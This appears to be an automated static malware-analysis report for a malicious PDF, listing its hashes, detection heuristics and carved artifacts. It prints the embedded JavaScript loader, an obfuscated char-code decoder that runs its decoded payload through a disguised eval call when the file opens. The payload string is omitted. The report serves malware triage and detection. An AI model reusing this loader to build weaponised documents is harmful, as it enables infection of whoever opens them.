Malicious PDF — malware analysis report

Static analysis result for SHA-256 3cfaccc4d2b76941…

MALICIOUS

PDF

Size: 37.5 KB
Created: 2010-04-12 17:50:08 +04:00
Authoring application: TCPDF (via TCPDF 4.8.032 (http://www.tcpdf.org))
First seen: 2026-05-10
MD5: 82b5485ddeabfc044ceb03f1c617593d
SHA-1: 33f6a9116eb2eb7cfa28df38129cdb92d15272b9
SHA-256: 3cfaccc4d2b769419d88961d486a657a0fa868e0bef4427a0bb49b6db4b89e6b
Risk Score: 74

Machine Learning

  • Nyx PDF Classifier malicious score 0.9999

Heuristics 4

  • Suspicious extracted artifact (severity: medium, rule: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • JavaScript action (severity: low, rule: PDF_JAVASCRIPT, 1 related finding)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Embedded JS stream (severity: low, rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Optional Content Group with action trigger (severity: low, rule: PDF_OPTIONAL_CONTENT)
    Optional Content Group (layer) co-occurs with an action trigger — content can be selectively hidden from viewers or scanners while the action still fires on open

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0010_000.js | pdf-javascript-stream | PDF /JS object 10 at offset 0x70A4 | 8330 bytes
SHA-256: 2cead8b384b8f6d7cf4281e97cdbcd12393601cfa6fbd5d1ebad226b169087c9
First 1,000 lines of the extracted script
var EyyRxbi = '[encoded payload string omitted]';
var lv3rOXGfu = 149;
EyyRxbi = EyyRxbi.replace(/[^0-9]/g,':');
obnEtzA7 = 'lv3rOXGfu';
EyyRxbi = EyyRxbi.replace(/::/g,'');
app.alert(EyyRxbi);
function Kd6DR5mqM5Rf ( xbbEg4tsFwsi, UceSljTPSh8d ) { var mSTOq = new String();var tXHVIBwCnc = new String();
KmbJj = xbbEg4tsFwsi .split(':');
for(x2o94gXb = 0; x2o94gXb < KmbJj.length-1;x2o94gXb++) { lCWfez4V= String['fromCharCode'](KmbJj[x2o94gXb] - UceSljTPSh8d);;
tXHVIBwCnc = tXHVIBwCnc + lCWfez4V;} return tXHVIBwCnc;};
obnEtzA7 = Kd6DR5mqM5Rf(EyyRxbi,lv3rOXGfu);
var PnyYOHIb = 'a';
var Y8kMnHyk = 'u';
gB3zT1jwV051 = app['set'+'TimeO' + Y8kMnHyk +'t']("ev"+PnyYOHIb+"l(obnEtzA7)", 1);
stream_001_off000070a4.js | decompressed-pdf-stream | PDF FlateDecoded stream at offset 0x70A4 | 4164 bytes
SHA-256: 3346b5dc67de4be3d067da80c1c67c2943b7ec5b420e3fd10dfd840f4ecd1805
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s). 10 of 19 identifiers look randomly generated (e.g. 'I266q259A248X265p254K260q259G181M249X250') — consistent with name-mangling obfuscation. Carved artifact contains 1 long base64-like blob(s).